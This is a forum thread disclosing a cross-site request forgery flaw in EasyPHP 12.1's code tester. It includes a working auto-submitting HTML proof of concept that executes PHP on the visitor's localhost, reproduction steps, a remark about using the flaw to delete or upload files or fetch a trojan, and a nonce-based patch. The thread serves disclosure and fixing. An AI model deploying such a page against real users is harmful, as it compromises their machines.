12.1 security vulnerability, remote execution of php/js, full compromise of your PC!

Copy below code as "whatever.html" (replace "hxxp" with "http") to some remote server and browse the page with your browser while EasyPHP is running locally.

The page will execute php and javascript on your local server.

With this your PC can be fully compromised, endless possibilites.

Quick fix: Rename or delete ..\EasyPHP-12.1\home\codetester.php

Real fix: Add a nonce[1] to codetester.php or only allow from local host.

[1] [en.wikipedia.org]

[2] whatever.html:
<html>
<head>
<title>EasyPHP 12.1 remote access</title>
</head>
<body onload="window.document.forms[0].submit();">
Some innocent page...
<form action="hxxp://127.0.0.1/home/codetester.php" method="post" target="easyphp" style="display:none;">
<textarea name="sourcecode">
<?php
phpinfo();
echo '<scr'.'ipt type="text/javascript">alert("pwned, php executed on your EasyPHP server")<'.'/scr'.'ipt>';
?>
</textarea>
<input type="hidden" name="to" value="interpretcode">
<input type="submit" value="pwn">
</form>
<iframe name="easyphp" src="about:blank" style="display:none;"></iframe>
</body>
</html>

No remote execution, Apache is listenning only on localhost.

Obviously you did not understand or try the supplied PoC code "whatever.html"

The page "whatever.html" executes php code on your localhost.

If EasyPHP 12.1 is running on your PC and you visit a page like "whatever.html" on some server in internet with your browser, you are pwned.

Ok, looks serious even I can't reproduce with my remote server and / or my browser. Please send me an email for further messages.

thierry
at
easyphp
dot
org

Works everywhere:

1. Copy above html (replace "hxxp" with "http") to file "whatever.html"
2. Upload to example.com/whatever.html
3. Start EasyPHP 12.1
4. Start your browser (Tested: Firefox latest, Chrome latest, IE7 on Windows XP)
5. Make sure that JavaScript is enabled in browser
6. Open example.com/whatever.html in browser
7. A popup appears: "pwned, php executed on your EasyPHP server"

When will you release a fix?

Will publish the bug on Full Disclosure Mailing List on 01. Nov. 2012

If anyone's concerned by this and wants a quick fix (without deleting the content of codetester.php), I've knocked up what I think should do the job until the EasyPHP team release a fix:

In codetester.php, change the first block of php to be:

include("i18n.inc.php");
include("functions.inc.php");
// Mod - lockdown the code tester to prevent remote exploits
session_start();

if (isset($_POST['to']) AND $_POST['to'] == "interpretcode") {
file_put_contents('codesource.php',
verify_nonce() ? $_POST['sourcecode'] : 'Detected an invalid submit, maybe an exploit attempt.');
}


Then further down in the file, find the line:

<input type="hidden" name="to" value="interpretcode" />

directly underneath it add the following line:

<input type="hidden" name="nonce" value="<?php echo get_nonce(); ?>" />



In index.php, we need to add the hidden input element for the nonce again, find the line:

<input type="hidden" name="to" value="interpretcode" />

directly beneath it add the line:

<input type="hidden" name="nonce" value="<?php echo get_nonce(); ?>" />



Finally in the functions.inc.php

Add the following function to the bottom of the php block (make sure its after the final "}" but before the "?>"):

//Mod - lockdown the code tester to prevent remote exploits
function get_nonce() {
$nonce = isset($_SESSION['nonce'])?$_SESSION['nonce']: hash('sha512', get_random_string());
$_SESSION['nonce'] = $nonce;
return $nonce;
}
function remove_nonce() {
unset($_SESSION['nonce']); //Remove the nonce from being used again!
}
function verify_nonce() {
$nonce = get_nonce(); // Fetch the nonce from the last request
remove_nonce(); // clear it so it can't be used again now we have it locally
session_regenerate_id(true); // replace old session, stops session fixation
// only verify if nonce is sent and matches what is expected
return (isset($_POST['nonce']) AND $_POST['nonce'] == $nonce);
}
function get_random_string()
{
$random_string = array();
for($index=0; $index<32; $index++)
{
//ascii chars 32 - 126 are printable (127 is DEL)
$random_string[] = chr( mt_rand(32,126));
}
return implode($random_string);
}


Its not perfect but it does work and will stop o2326570 from creating a popup on your PC, naughty hacker! ;-)

PS - this site removed the indenting, sorry.

Russell Wrote:
-------------------------------------------------------
> Its not perfect but it does work and will stop
> o2326570 from creating a popup on your PC, naughty
> hacker! ;-)

For interested readers, instead of creating a popup it would be actually very easy to just silently delete all your files in the "My Documents" folder or upload them to some remote folder or download and start some hxxp://example.com/trojan.exe or whatever...

Thanks for providing a fix, Russell, the authors of EasyPHP obviously don't care...

o2326570,

I didn't meant to suggest all you can do is make popups. You're completely right about the potential for exploits.

The little ascii wink face was a nod to you.

Everyone else,

Since the rain has spoiled my plans for the afternoon, I've hosted the mod on github for anyone who isn't confident making the mod manually: [github.com]

Backup your EasyPHP-12.1/home directory before copying these files over (just in case), then just pull/download from github and copy into the EasyPHP-12.1/home directory. For those without git, use the "ZIP" button near the top of the page.

Russell

This is indeed very serious. I'm very surprised that the EasyPHP developers haven't fixed this and made a new release long time ago. Today it's one month since this thread was started.

I can of course reproduce the issue and I can verify that the nonce-implementation from Russel stops exploits - thx, Russel.

With the code already there, the only thing needed is to repackage the 12.1 release - nothing to wait for developers.

Seems the developers just don't care.

Or maybe the developers don't know anything about security.

Conclusion in either case: Better think twice before using a software from developers like this. There are alternatives...

And what do you care of when you publish (here) an exploit ?

Yes, we have responsibility, but no enough time to make a new release.
But you also probably knows "white hat" ethic:
- signal to publisher
- if no reply publish about the failure. But never an exploit code.

This failure will never used by real hackers because it's better to found something in Acrobat or other wildspread soft.

You're right, it's a failure. You're wrong, it's not so important and you don't follow rules.


So stop crying, kiddy.



Edited 1 time(s). Last edit at 11/30/2012 08:22PM by Thierry.